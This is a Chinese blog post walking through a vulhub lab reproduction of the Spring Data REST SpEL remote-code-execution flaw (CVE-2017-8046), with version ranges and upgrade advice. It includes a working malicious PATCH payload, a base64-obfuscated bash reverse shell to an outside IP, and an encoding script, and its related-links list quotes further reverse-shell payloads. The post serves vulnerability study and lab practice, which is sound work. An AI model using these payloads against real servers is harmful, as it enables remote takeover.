vulhub中Spring之CVE-2017-8046漏洞复现

最新推荐文章于 2024-08-07 19:59:12 发布
最新推荐文章于 2024-08-07 19:59:12 发布
阅读量1.1k 收藏
点赞数
分类专栏: 渗透测试篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41438728/article/details/110425174
版权

vulhub中Spring之CVE-2017-8046漏洞复现

Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

漏洞复现

漏洞说明

Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。

漏洞利用条件和方式

网站使用Spring Data REST提供REST Web服务,且版本在受影响范围内。

漏洞影响范围

Spring Data REST 2.5.12, 2.6.7, 3.0 RC3之前的版本
Spring Boot 2.0.0M4之前的版本
Spring Data release trains Kay-RC3之前的版本

漏洞检测

开发人员检查使用的Spring框架是否在受影响版本范围内。

环境搭建

执行如下命令启动漏洞环境:

docker-compose up -d

等待环境启动完成,然后访问http://your-ip:8080/即可看到json格式的返回值,说明这是一个Restful风格的API服务器。

漏洞复现

需要用PATCH方法,而且请求格式为JSON。根据RFC 6902,发送JSON文档结构需要注意以下两点:

1.请求头为Content-Type: application/json-patch+json;
2.需要参数op、路径path,其中op所支持的方法很多,如test,add,replace等,path参数则必须使用斜杠分割。

访问http://your-ip:8080/customers/1,看到一个资源。我们使用PATCH请求来修改之:

PATCH /customers/1 HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

path的值是SpEL表达式,发送上述数据包,将执行new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success
(new byte[]{111,112,101,110,32,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112}))/lastName", "value": "vulhub" }表示的命令:open /Applications/Calculator.app

1、访问http://your-ip:8080/customers/1,看到一个资源。
在这里插入图片描述
2、抓包修改GET为PATCH请求,添加请求头为Content-Type: application/json-patch+json;添加命令参数。
在这里插入图片描述
Content-Type: application/json-patch+json(必须修改这里)
path的值是SpEL表达式,发送上述数据包,将执行new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success
3、执行后,进入容器docker-compose exec spring bash查看,创建success文件:
在这里插入图片描述
4、尝试将bytecode改成反弹shell的命令(注意:Java反弹shell的限制与绕过方式

执行命令:`bash -i >& /dev/tcp/127.0.0.1/7777 0>& 1`

转换:`bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTAuMTU4LjE5My45Mi8yMjIyIDA+JiAx}|{base64,-d}|{bash,-i}`

改成10进制编码:`[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,78,84,65, 117,77,84,85,52,76,106,69,53,77,121,52,53,77,105,56,121,77,106,73,121,73,68,65,43,74,105,65,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastName", "value": "vulhub" }]`

(文后附python转编码的脚本)

5、修改path中的值,发包:
在这里插入图片描述
6、反弹成功!
在这里插入图片描述
附加:
字符串转ASiiC码

[root@VM_0_9_centos CVE-2017-8046]# vim char.py

import numpy as np

str = 'touch /tmp/success'

ascii = np.fromstring(str, dtype=np.uint8)

print(ascii)

[root@VM_0_9_centos CVE-2017-8046]# python char.py
[116 111 117  99 104  32  47 116 109 112  47 115 117  99  99 101 115 115]

漏洞修复

升级到以下最新版本:
Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
Spring Boot 2.0.0.M4
Spring Data release train Kay-RC3

德古拉的杂货铺
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Jetty Utility Servlets ConcatServlet 双重解码信息泄露漏洞CVE-2021-28169
qq_51577576的博客
09-12 1686
[ vulhub漏洞复现篇 ] Jetty Utility Servlets ConcatServlet 双重解码信息泄露漏洞CVE-2021-28169
Spring data rest漏洞在IDEA复现CVE-2017-8046
wxzyyds的博客
11-06 1229
这篇文章主要讲述了spring data rest(CVE-2017-8046)由于spel表达式没有进行过滤而导致的远程RCE,本片文章利用了IDEA的动态调试,实现了对于漏洞产生原因的详细复现
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
m0_58596609的博客
04-22 1182
CVE-2017-8046-Spring Data Rest RCE 漏洞复现
常见框架漏洞大全(附带修复方法)
最新发布
C233333235的博客
08-07 653
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与复现
一个有情怀的程序猿博客
06-30 1074
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越来越不受待见。 因此,我们有理由相信Spring引入SpEL必然增加安全风险。事实上,过去多个Spring CVE都与其..
漏洞复现 | CVE-2017-8046 Spring Data Rest 远程命令执行
weixin_42282189的博客
09-13 736
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响范围: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data r.
vulhub-漏洞复现Spring Data Rest 远程命令执行漏洞CVE-2017-8046))
weixin_45095113的博客
12-08 507
vulhub漏洞复现
spring CVE-2017-4971漏洞复现
shangMD01的博客
03-17 3786
搭建漏洞环境: cd vulhub/spring/CVE-2017-4971 docker-compose up -d 查看容器是否开启: 在浏览器打开网站: 填写合法信息: 此处存在命令执行,可反弹shell 使用如下反弹shell的Payload: _eventId_confirm=&_csrf=57033da7-4538-42ec-9933-e12ac3e97db5&_(new+java.lang.ProcessBuilder("bash","-.
漏洞复现Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1340
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞CVE-2017-7525)
JiangBuLiu的博客
07-10 8322
Jackson-databind 反序列化漏洞CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
Jackson-databind 反序列化漏洞CVE-2017-17485)
玄道的网安博客
06-17 1899
漏洞搭建 cd /root/vulhub/jackson/CVE-2017-7525 docker-compose up -d 漏洞原理 利用 FileSystemXmlApplicationContext加载远程 bean 定义文件,创建 ProcessBuilder bean,并在 xml 文件使用 Spring EL 来调用 start()方法实现命令执行 CVE-2017-7525 黑名单修复绕过,利用了 org.springframework.context.suppor...
Spring Data Rest 远程命令执行漏洞复现(CVE-2017-8046)
baidu_38844729的博客
07-06 3225
漏洞分析 漏洞原理: Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响版本: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data release trains < Kay-RC3 漏洞复现 1、启动环境 cd v
spring-data-rest-rec 复现分析 cve-2017-8046
whatday的专栏
07-06 521
漏洞信息 pivotal发布的漏洞信息如下: Malicious PATCH requests submitted to servers using Spring Data REST backed HTTP resources can use specially crafted JSON data to run arbitrary Java code. 简而言之,就是Spring Data REST对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为spring的SPE
CVE-2017-8046 复现与分析
weixin_30715523的博客
07-28 294
环境搭建 使用的项目为https://github.com/spring-guides/gs-accessing-data-rest.git里面的complete,直接用IDEA导入,并修改pom.xml版本信息为漏洞版本。这里改为1.5.6。 之前尝试搭建了另一个验证环境,但是修改版本后加载一直报错,不知道是什么原因,写完在研究下。 直接运行,默认端口8080,访问http://lo...
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞复现(最详细版本)
精品博客,你值得一看~
09-17 982
在REST API的Patch方法(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
spring CVE-2017-8046 POC
weixin_45427650的博客
04-15 468
为了练习 argparse 库 import requests import json import base64 import argparse def Option_Check(i, headers, payload): try: r = requests.options(i, timeout=0.5) if r.status_code == 200: r = r.text if r.find('patch'):
Spring Data Rest远程命令执行漏洞复现CVE-2017-8046
wutiangui的博客
09-10 422
Spring Data Rest服务器在处理PATCH请求时存在一个远程代码执行漏洞。攻击者通过构造好的JSON数据来执行任意Java代码。将Content-Type指定为application/json-patch+json。使用python将准备执行的代码编码为十进制。访问以下链接,出现如下界面说明存在漏洞。1.准备shell命令。修改方法改为PATCH。
CVE-2017-8046Spring Data Rest RCE)
weixin_30763455的博客
04-10 223
环境搭建参考第一个链接,springboot启动文件如下,不同的启类,将Application.class修改一下就可以了,直接debug。注意:默认版本是2.0.3版本,修改成低版本,看一下mvn下载的jar包版本 漏洞利用: 第一次请求: 第二次请求: 注意的点: 需要用PATCH方法,而且请求格式为JSON。根据RFC 6902,发送JSON文档结构需要注意以下两点: 1、请...
cve-2017-7504漏洞复现
08-23
对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值